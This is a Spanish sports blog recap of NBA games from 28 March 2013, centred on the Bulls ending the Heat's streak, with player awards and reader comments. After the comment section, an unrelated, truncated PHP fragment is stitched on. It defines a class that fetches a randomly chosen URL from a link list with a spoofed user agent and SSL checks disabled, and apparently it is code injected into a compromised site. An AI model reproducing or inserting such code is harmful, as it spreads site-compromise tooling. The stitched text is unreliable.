La Crónica: The Streak Is Over!

28 de March de 2013 por Simon

Hinrich JAmesSe terminó la racha para LeBron y sus Heat. Chicago Bulls fue capaz de defender su feudo ante King James y su corte. La última derrota de Miami databa del 1 de febrero en Indiana. El guión del partido parecía casi un calco a los 3 o 4 últimos de Miami pero ayer les pilló el toro: comienzo dubitativo, el rival coge muy pronto cómodas ventajas para, en la segunda parte, remontar. Esto último ocurrió sólo en parte, pues Miami llegó a estar por encima en el marcador pero falló la última parte, la de sentenciar el partido. Chicago Bulls, con un gran dominio de los tableros personificado en Boozer, y la intensidad de Deng y Butler y las diabluras de Nate Robinson se llevaron la victoria (97-101) con un gran último cuarto sin pasar apuros para vencer a los campeones en el cuerpo a cuerpo. LeBron tuvo un partido normalito para lo que es él y se le vio algo desquiciado viendo que se le escapaba la victoria.

En los puestos cabeceros del oeste ayer teníamos varios partidos muy atractivos. Denver visitaba la cancha del líder, San Antonio Spurs. El partido fue precioso, con constantes alternativas sobre todo en los últimos 15 minutos del partido, aunque en los últimos segundos ninguno de los dos equipos estuvo demasiado acertado y el eterno Andre Miller falló el tiro ganador tras una penetración muy forzada después de recibir un mal balón de Gallinari (99-100). Tim Duncan no falta nunca a su cita en los grandes encuentros y ayer terminó el partido con 23 puntos, 14 rebotes y 5 tapones. Estuvo bien acompañado por los 6 triples de Danny Green y los 18 puntos y 11 asistencias de Tony Parker. El rival de Spurs para ser el primero del oeste, Oklahoma City Thunder, cumplió ante Washington Wizards, que lejos de la capital bajan muchos enteros. Partido cómodo para los Thunder, que siempre dispusieron de ventajas que superaban los 10 puntos y pudieron dar minutos a los menos habituales (80-103). 21-4-4 para Westbrook y 21-6-6 de Durant.

En el duelo por el tercer puesto del oeste ayer entraban todos los equipos implicados en la lucha y sólo uno termino llevándose la victoria, Los Angeles Clippers, que vencieron con un gran último cuarto a New Orleans Hornets (105-91). El juego de Clippers estuvo muy repartido destacándose, cómo no, Chris Paul, que logró 16 puntos, 9 asistencias, 6 rebotes y 4 robos. En NOLA buenos partidos de Gordon y Davis. Por su parte Memphis, cayó en el Madison en la sorprendente vuelta a la acción de Marc Gasol. La primera parte fue un autentico repaso de New York a Memphis, con ventajas que superaban la veintena. En la segunda parte Memphis se entonó, lo que unido a la relajación normal de New York hizo que Memphis a punto estuviera de meterse en el partido, pero un triple de Kidd cuando más se acercaban los Grizzlies acabó con todas sus esperanzas (101-108). Nuevo partidazo de JR Smith, que anotó 35 puntazos desde el banquillo para ser el mejor de su equipo. El mejor sexto hombre del año ya tiene nombre. En los Grizzlies gran partido de Bayless desde el banquillo y de Conley, con 24 y 26 puntos respectivamente.

Indiana Pacers, a pesar de su victoria, se mantienen en el tercer escalón de la conferencia Este. Ayer vencieron a domicilio a Houston Rockets con un partidazo de casi todos sus titulares a excepción de George Hill, que fue sencillamente horrible. Roy Hibbert viene subiendo el nivel últimamente y ayer lo volvió a hacer: 28 puntos, 13 rebotes y 3 tapones. Indiana cimentó su victoria en un gran primer cuarto que Houston nunca pudo remontar (100-91). Brooklyn Nets venció sin problemas a Portland con un nuevo partidazo de su pareja interior. 28 puntos para López y atención, 22 puntos y ¡¡¡26 rebotes!!! para Reggie Evans, 12 de ellos ofensivos. En el primer cuarto Brooklyn ya ganaba por 20, por lo que el partido no tuvo ninguna historia (111-93).

RICKY DWIGHTLos Ángeles Lakers volvieron a la senda de la victoria ante Minnesota Timberwolves. Tras un primer tiempo igualado, Lakers parecía marcharse en el tercer cuarto pero los Wolves no querían dejar escapar el partido tan fácil y a punto estuvieron de remontar gracias al Hack-a-Howard. De hecho, podrían haber forzado la prórroga si los árbitros hubieran cobrado la falta que cometió Bryant en los últimos segundos sobre Ricky y éste hubiera convertido sus tiros libres (120-117). Gran partido del Big Four de Lakers, Howard fue una auténtica apisonadora y termino el partido con 25 puntos, 16 rebotes, 5 tapones y otros tantos robos, Gasol con 17 puntos y 9 rebotes, Bryant 31 y 7 asistencias y Nash 16-8. Pero no nos engañemos, tanto mérito tienen ellos como la nula defensa que plantearon los Wolves. A menudo he visto en patios de colegio defender más.

Por su parte los Jazz no pierden comba y vencieron ayer a Phoenix de manera cómoda (88-103) de la mano de un Gordon Hayward que está terminando la temporada en un gran estado de forma. 25 puntos 5 rebotes y 6 asistencias para él, bien acompañado por Jefferson con 25 puntos y 9 rebotes. En el resto de la jornada, Boston rompió su racha de derrotas con un espectacular último minuto de los verdes que culminó una canasta ganadora de Jeff Green (93-92). Charlotte venció a Orlando en el duelo de colistas (108-114). Sacramento sorprendió a los Warriors en su casa (105-98) con un impresionante Isaiah Thomas, autor de 31 puntos. Bucks cayó en Philadelphia (92-100) y Atlanta dio buena cuenta de Toronto (107-88).

PREMIOS

tdMVP: Premio colectivo para los Bulls, capaces de poner fin a la racha de los Heat pese a no contar con Derrick Rose ni Joakim Noah. La dupla Deng & Boozer logró 49 puntos, 24 rebotes y 8 asistencias. Otro de los protagonistas de la jornada fue JR Smith, con 35 puntos (10/18 tiros de campo) y 7 rebotes en la victoria de los Knicks. Kobe & Dwight se fueron hasta los 56 puntos con 21/34 tiros, a los que Howard añadió 16 rebotes, 5 tapones y 5 robos. Y a nadie le importa, pero Kemba Walker & Gerald Henderson sumaron 68 puntos (34 por cabeza) con 25/41 en tiros, además de 14 rebotes y 11 asistencias en el triunfo de los Bocats. Tim Duncan también opositó para el premio con 23-14-5.

Rookie: No estuvo especialmente brillante Lillard (15-4-3). Mejor le fue a Anthony Davis, con 19 puntos, 9 rebotes y 2 asistencias, números muy similares a los firmados por Valanciunas: 19 puntos, 8 rebotes y 1 tapón. Sin embargo, el mejor novato fue Kyle O’Quinn, excelente en sustitución de Vucevic con 23 puntos (11/14 tiros), 11 rebotes y 6 asistencias. Otra joya para los Magic.

Sorpresa: Que Reggie Evans atrape 26 rebotes ya no nos sorprende. Que anote 22 puntos, sí. Career night en toda regla para el ala-pívot.

Decepción: No sólo se quedó a 0 Brandon Jennings, sino que mantuvo una tensa discusión con Boylan que acabó con el base castigado en el banquillo durante la segunda mitad. Noches horribles también para Klay Thompson (1 de 13 en tiros) en la derrota ante los Kings y para Greivis Vásquez, que reapareció de su lesión pero no anotó y todo lo que aportó fueron 4 asistencias, 2 rebotes y 3 pérdidas.

Esfuerzo en vano: Hay que dárselo a LeBron James, que no se rindió ante la dura, durísima defensa de los Bulls, y logró 32 puntos, 7 rebotes, 4 tapones y 3 asistencias. Pero merece mención también Tobias Harris, que anotó 29 puntos con 9 rebotes, 6 asistencias y 3 tapones, números propios del mismísimo LeBron.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Primero la falta clara y segundo falta mal hecha ya que Ricky no es un pródigo tirador de triples y además éste iba forzado.Es cierto que puede que tuviera presión añadida de empatar el encuentro pero no menos cierto es que eran 3 tiros libres.Y encima el señor Kobe Bryant ejerciendo de status en la liga y diciendo que no era falta y que si hubieran llegado a la prórroga hubieran ganado igual.Lamentable,como los Lakers que casi tiran por la borda su partido.¡¡¡Y están en el filo jugándose los PO!!!

    Verdaderamente creo que al que más ilusión le hacía alcanzar la racha de los Lakers era a LeBron y al resto del equipo…no se la traía floja por así decirlo pero vamos.Lo mejor de todo es que se olvidan las rachas y pueden dosificarse para PO que falta hace.

      Citar

  2. Jose Luis dice:
    #2

    Demasiadas tonterías hizo ayer LeBron… primero empujando a Boozer, luego colgándose de su propio aro intentando que la bomba de Nate no entrase… en fin, lo vi bastante superado por unos Bulls en los que ni siquiera jugó Noah. Debería evitar hacer esas payasadas.

      Citar

  3. rumbero dice:
    #3

    Yo los calentones de Lebron durante el partido los puedo llegar a entender porque como dice Ruxixón se veía que era el 1º que quería superar esa racha de los Lakers y veía como se les complicaba el asunto. Lo que más me sobra son las declaraciones de después quejándose del arbitraje cuando a pesar de los muchos palos que se suele llevar es uno de los jugadores más protegido en ese sentido junto con Durant.

    El partido estuvo muy bonito. Parecía que en el último cuarto los Heat iban a poner la directa como suele ser habitual después de un gran tercer cuarto pero estos Bulls se parecen a los Celtics a la hora d pelear con Miami a pesar de las bajas. Luego llegaran los PO e igual la cosa cambia pero no veo el momento de que vuelva Rose para verlos al completo. Para mi tiene mucho mérito lo que consigue Thibodeau.

    Gran crónica Simón, como siempre. Uno desconecta unos días y no hay mejor manera de ponerse al día que pasarse por aquí a leer la crónicas. Los Mavs en la pomada, eso si que no me lo esparaba. Ojo si sacan adelante los 3 partidos que vienen (contando el duelo contra Lakers) porque entonces la cosa se va a poner muy divertida.

      Citar

  4. Esteban dice:
    #4

    vergonzoza manera de perder la racha el HEAT, puesto que estaban completos, frente a unos bulls sin sus all-star, ROSE y NOAH

    no parecen tan duros como se creen estos heat

      Citar

  5. Futurman dice:
    #5

    Como se sube al carro la gente para criticar a los Heat, Lebron está cabreado por perder la racha y ya está. Y tampoco es normal que Boozer y compañía hagan partidos tan buenos.

      Citar

  6. Rompe dice:
    #6

    Vamos, lo que faltaba, que se critique a los Heat porque “sólo” han conseguido 27 victorias seguidas…

      Citar

  7. nba dice:
    #7

    Esperemos que esta derrota de Heat no despierte aun mas a la bestia, por cierto, punto positivo por la eleccion de la foto de Hinrich-James

      Citar

  8. MagicJohnson32 dice:
    #8

    nba:
    Esperemos que esta derrota de Heat no despierte aun mas a la bestia, por cierto, punto positivo por la eleccion de la foto de Hinrich-James

    La foto la he elegido yo 😀 Me ha parecido tremenda…

      Citar

  9. MagicJohnson32 dice:
    #9

    Qué descarado el tanking de los Suns. Hunter dice que sienta a Dragic, que últimamente se estaba saliendo, para darle descanso. ¿Descanso para qué? ¿De cara a los Playoffs? Vamoshombrenomejodas…

      Citar

  10. Esteban dice:
    #10

    vamos, no es que el HEAT no sea un super equipo de los mejores quiza de la historia y que marcaran epoca

    pero hay que poner las cosas en contexto, su superioridad en la conferencia este se debe a que no han tenido lesiones de gravedad, algunos partidos wade y otros bosh pero nada grave

    mientras que los bulls ha jugado todo el año sin su MVP rose
    los pacers todo el año sin GRANGER
    los celtics casi todo el año sin RONDO, entre otras muchas lesiones
    los knicks casi todo el año sin amare, y contando los partidos que ha faltado anthony, felton, kidd, camby, wallace, shupert y chandler han estado muy muy diesmados
    los netys han contado a cuentagotas con wallace
    los 76ers no vieron ni ponerse la camiste a bynum

    en oeste podemos hablar de los lakers, manuy en los spurs, love entra varios mas

    mientras que el HEAT esta ileso, frescos y sin problemas de lesiones sacan una ventaja enorme a sus rivales mas alla de lo buenos que sean

      Citar

  11. Rompe dice:
    #11

    Eso que comentas, Esteban, en parte también es mérito de los Heat. O que físicamente se cuidan más, o que no les hace falta exprimirse tanto y son capaces de estar más sanos… Y eso, más que un punto negativo, lo veo como algo que engrandece aún más su temporada.

      Citar

  12. nba dice:
    #12

    Curioso el planteamiento de D’Antoni, que ni jarto de grifa parece que vaya a contar con Ebanks en lo que queda de temporada, teniendo en cuenta que deberia ser el sustituto natural de MWP, que le vayan preparando el ataud…

      Citar

  13. Jose Luis dice:
    #13

    Danny Granger fuera toda la temporada… El Este, abierto de par en par para el Heat

      Citar

  14. Jose Luis dice:
    #14

    Qué bien están jugando los Lakers… veremos la segunda parte, que llegarán más fundidos.

      Citar

  15. Jose Luis dice:
    #15

    Uf vaya tercer cuarto cometiendo 8 pérdidas y concediendo nosécuántos rebotes ofensivos… 5 abajo entrando al último cuarto. Dallas empata con Indiana al descanso.

      Citar

  16. Jose Luis dice:
    #16

    Jodie Meeks lleva unas semanitas… madre mía.

      Citar

  17. Jose Luis dice:
    #17

    Nash parece tocado, no ha jugado en un buen tramo… Bryant está cansado, se le nota el back-to-back… 10 abajo a falta de 4 minutos, por ahora Dallas pierde por 7 con Indiana.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>